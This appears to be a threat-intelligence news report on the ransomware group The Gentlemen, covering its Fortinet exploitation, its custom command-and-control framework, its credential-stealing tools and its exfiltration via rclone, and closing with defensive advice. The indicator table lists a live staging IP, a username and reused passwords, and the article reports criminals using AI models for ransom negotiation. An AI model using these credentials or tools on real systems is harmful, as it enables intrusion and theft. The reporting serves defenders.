A Russian-speaking ransomware crew known as The Gentlemen has quickly risen to become one of the most active threats in 2026, ranking second only to Qilin in ransomware activity.
Their toolkit combines Fortinet vulnerability exploitation, AI-assisted operations, and a fully custom command-and-control framework that most security tools simply do not see coming.
The group operates without a central office or traditional payroll structure. Nine operator handles have been identified communicating across time zones through a self-hosted Rocket.Chat instance on an onion site, with plans to migrate to a Rust-based platform.
Their lean, distributed model marks a clear shift from the rigid corporate setup that groups like Conti once maintained.
In May 2026, the Ransom-ISAC research team extracted 3,366 messages from The Gentlemen’s Rocket.Chat server, exposing internal plans, tooling discussions, and victim targeting details.
Analysts at Vectra AI noted the findings in a report shared with Cyber Security News (CSN), observing that while the group’s tools have changed considerably, the core weaknesses they exploit in victim networks have stayed nearly the same since 2022.
The leaked messages also uncovered a connection between The Gentlemen and earlier ransomware brands. A negotiator known by the handle “Tinker” appeared in both Black Basta chats and The Gentlemen’s logs, performing the same operational role across both groups.
A shared Matrix homeserver, bestflowers247.online, was present in archives from both groups, anchoring that infrastructure link with hard evidence.
This pattern points to a larger truth: ransomware operators do not retire, they rebrand. The same people carry their knowledge and access from one criminal enterprise to the next, making group takedowns far less effective than many defenders might hope.
Gentlemen Ransomware Uses Fortinet Exploits, AI, and Custom C2 Frameworks
Fortinet remains the front door of choice for The Gentlemen. The Rocket.Chat logs mention FortiGate 81 times, with CVE-2024-55591, a FortiOS authentication bypass flaw, called out explicitly as their primary way into victim networks.
Halcyon’s separate analysis found the group brute-forcing roughly 1,000 Fortinet VPNs, in some cases using reused passwords like gentlemen25 and gentle26 across multiple victims.
Once inside, the group deploys a custom C2 framework called G-BOT. This previously undocumented control panel supports per-beacon SOCKS5 tunneling and uploads builders to temporary file-sharing sites, replacing commercial tools like Cobalt Strike.
That switch makes detection harder for security teams relying on known signatures.
The group also targets hypervisors directly. Their Linux locker attacks Hyper-V Volume Manager, encrypting at the hypervisor level so that endpoint agents inside virtual machines cannot see the attack.
The locker drops the extension .i8p14s and leaves a ransom note named README-GENTLEMEN.txt, signaling that no layer of infrastructure is off limits.
AI and Credential Theft Complete the Kill Chain
The Gentlemen have moved AI from a novelty into a working part of their operation. Operators reference using GPT and Claude models to assist with ransom negotiations, with one operator describing them as automatic response writers for victim communications.
The group also discusses renting GPUs on vast.ai and running uncensored AI models from Hugging Face to triage large volumes of stolen data.
For credential theft, the group relies on Phemedrone Stealer V2.3.2, LummaC2, XenAllPasswordPro, Chrome App-Bound Encryption Decryption, and DumpBrowserSecrets.
These tools pull saved passwords directly out of browsers without triggering login failures, meaning standard authentication logs show nothing unusual. Stolen data then moves out through rclone to MEGA, following the same exfiltration pattern ransomware groups have used for years.
Defenders have clear steps based on what the leaked chats reveal. Security teams should audit edge devices including Palo Alto, Fortinet, Citrix, F5, and Cisco gear against the CVE list discussed in operator chats.
Treating NTDS.dit and VSS backup access as an immediate severity-one alert, rather than a forensic discovery made weeks later, can stop domain-wide compromises before they fully develop.
Hunting for tools like rclone, MEGAcmd, WinSCP, and Velociraptor on hosts that have no reason to run them adds an early warning layer that logs alone cannot provide.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| CVE | CVE-2024-55591 | FortiOS authentication bypass; primary initial access vector used by The Gentlemen |
| CVE | CVE-2024-3400 | Palo Alto Networks PAN-OS zero-day; most-discussed CVE in Black Basta operator chats |
| CVE | CVE-2025-32433 | Erlang/OTP SSH RCE; present in The Gentlemen toolkit |
| CVE | CVE-2025-33073 | NTLM relay vulnerability; present in The Gentlemen toolkit |
| CVE | CVE-2023-4966 | Citrix NetScaler; referenced in operator CVE discussions |
| CVE | CVE-2020-5135 | SonicWall stack buffer overflow (CVSS 9.4); used by Conti operators |
| Domain | bestflowers247.online | Shared Matrix homeserver linking Black Basta and The Gentlemen operators |
| IP / SSH | 193.228.128.2:2222 | NAS staging server used in The Gentlemen rclone exfiltration pipeline |
| Credential | userd0wnloAd1 | Username for NAS staging server used during data exfiltration |
| Password | gentlemen25 / Gentlemen25 / gentle26 | Reused VPN passwords found across multiple Fortinet-targeted victims |
| File Extension | .i8p14s | File extension appended by The Gentlemen Linux/NAS locker |
| File Name | README-GENTLEMEN.txt | Ransom note dropped by The Gentlemen Linux locker |
| Tool | Phemedrone Stealer V2.3.2 | Credential stealer used by The Gentlemen for browser password harvesting |
| Tool | LummaC2 | Credential stealer / payload dropper used by both Black Basta and The Gentlemen |
| Tool | XenAllPasswordPro | Password recovery tool used for credential theft |
| Tool | DumpBrowserSecrets | Browser credential dumping tool used by The Gentlemen |
| Tool | Chrome App-Bound Encryption Decryption | Tool for bypassing Chrome credential protection |
| Tool | G-BOT | Custom C2 framework with SOCKS5 tunneling used by The Gentlemen |
| Tool | rclone | Data exfiltration tool used to stage stolen data to MEGA |
| Tool | Velociraptor | Legitimate DFIR tool repurposed by The Gentlemen as C2 |
| File | qwertyuio.txt | File used by LummaC2 to store exfiltrated credentials (observed in Black Basta) |
| File | README-GENTLEMEN.txt | Ransom note filename dropped by group’s Linux locker |
| Path | /opt/updateamd | Linux locker binary invocation path used by The Gentlemen |
| Archive | JA456 | Follow-on leak package exposing Gentlemen operator-side artifacts including NAS and MEGA session data |
| Platform | temp.sh / 0x0.st | Temporary file-sharing sites used to upload G-BOT builder payloads |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
